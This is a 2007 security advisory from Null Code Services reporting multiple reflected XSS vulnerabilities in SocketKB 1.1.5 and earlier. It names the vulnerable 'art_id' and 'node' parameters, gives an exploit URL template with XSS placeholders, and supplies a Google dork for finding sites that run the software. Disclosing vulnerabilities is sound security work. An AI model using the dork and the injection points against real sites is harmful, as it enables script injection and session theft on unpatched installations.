+==================================================================+
+      SocketKB <=1.1.5 (XSS) Multiple Remote Vulnerabilities      +
+==================================================================+


Author(s): Ivan Sanchez  &  Maximiliano Soler.

Product: SocketKB.

Description: PHP Knowledge Base builder and article management system.

Web: http://www.socketkb.com/site/home/

Versions: 1.1.5 (or less)

Date: 19/10/2007




GOOGLE DORKS:
------------
[+] intext:"Powered by SocketKB version"



EXPLOIT:
--------

For example...after the variable "node" or "art_id"

http://www.[DOMAIN].tld/[PATH]/?__f=article&art_id=###[XSS]&node=###[XSS]

Note:
### -> it is number of "art_id" and "node"



NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+==================================================================+
+      SocketKB <=1.1.5 (XSS) Multiple Remote Vulnerabilities      +
+==================================================================+

-- 
     Maximiliano Soler.
  Reports & Review Code.

    Null Code Services.
    www.nullcode.com.ar

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.